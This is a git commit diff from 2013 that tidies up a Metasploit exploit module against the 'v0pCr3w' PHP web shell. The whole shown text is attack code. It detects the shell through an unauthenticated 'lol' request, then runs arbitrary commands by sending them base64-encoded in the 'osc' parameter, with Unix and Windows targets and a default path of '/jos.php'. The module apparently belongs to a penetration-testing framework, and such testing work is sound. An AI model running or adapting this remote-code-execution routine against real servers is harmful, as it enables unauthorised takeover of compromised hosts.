Merge pull request #1 from jvazquez-r7/v0pCr3w_work

(B)rian (Wall)ace · (B)rian (Wall)ace · commit cf9ca39c8944 · 2013-03-27T13:06:09.000-07:00
cleanup for v0pCr3w_exec
diff --git a/modules/exploits/multi/http/v0pcr3w_exec.rb b/modules/exploits/multi/http/v0pcr3w_exec.rb
@@ -8,15 +8,16 @@
 require 'msf/core'
 
 class Metasploit3 < Msf::Exploit::Remote
+	Rank = GreatRanking
 
 	include Msf::Exploit::Remote::HttpClient
 
 	def initialize(info={})
 		super(update_info(info,
-			'Name'           => '"v0pCr3w" Web Shell Remote Code Execution',
+			'Name'           => 'v0pCr3w Web Shell Remote Code Execution',
 			'Description'    => %q{
-				This module exploits a lack of authentication in the shell developed by v0pCr3w
-				and is widely reused in automated RFI payloads.  This module takes advantage of the
+					This module exploits a lack of authentication in the shell developed by v0pCr3w
+				and is widely reused in automated RFI payloads. This module takes advantage of the
 				shell's various methods to execute commands.
 			},
 			'License'        => MSF_LICENSE,
@@ -27,7 +28,7 @@ def initialize(info={})
 			'References'     =>
 				[
 					['URL', 'https://defense.ballastsecurity.net/wiki/index.php/V0pCr3w_shell'],
-					['URL', 'https://defense.ballastsecurity.net/decoding/index.php?hash=f6b534edf37c3cc0aa88997810daf9c0'],
+					['URL', 'https://defense.ballastsecurity.net/decoding/index.php?hash=f6b534edf37c3cc0aa88997810daf9c0']
 				],
 			'Privileged'     => false,
 			'Payload'        =>
@@ -42,23 +43,27 @@ def initialize(info={})
 				},
 			'Platform'       => ['unix', 'win'],
 			'Arch'           => ARCH_CMD,
-			'Targets'        => [['Automatic',{}]],
+			'Targets'        =>
+				[
+					['v0pCr3w / Unix', { 'Platform' => 'unix' } ],
+					['v0pCr3w / Windows', { 'Platform' => 'win' } ]
+				],
 			'DisclosureDate' => 'Mar 23 2013',
 			'DefaultTarget'  => 0))
 
 		register_options(
 			[
-				OptString.new('URI',[true, "The path to the v0pCr3w shell", "/"]),
+				OptString.new('TARGETURI', [true, "The path to the v0pCr3w shell", "/jos.php"]),
 			],self.class)
 	end
 
 	def check
 		shell = send_request_cgi({
-		    'method'   => 'GET',
-		    'uri'      => normalize_uri(datastore['URI']),
-		    'vars_get' => {
-			'lol' => '1'
-		    }
+			'method'   => 'GET',
+			'uri'      => normalize_uri(target_uri.path.to_s),
+			'vars_get' => {
+				'lol' => '1'
+			}
 		})
 		if (shell and shell.body =~ /v0pCr3w\<br\>/ and shell.body =~ /\<br\>nob0dyCr3w/)
 			return Exploit::CheckCode::Vulnerable
@@ -69,11 +74,11 @@ def check
 	def http_send_command(cmd)
 		p = Rex::Text.encode_base64(cmd)
 		res = send_request_cgi({
-		    'method'   => 'GET',
-		    'uri'      => normalize_uri(datastore['URI']),
-		    'vars_get' => {
-			'osc' => p
-		    }
+			'method'   => 'GET',
+			'uri'      => normalize_uri(target_uri.path.to_s),
+			'vars_get' => {
+				'osc' => p
+			}
 		})
 		if not (res and res.code == 200)
 			fail_with(Exploit::Failure::Unknown, 'Failed to execute the command.')
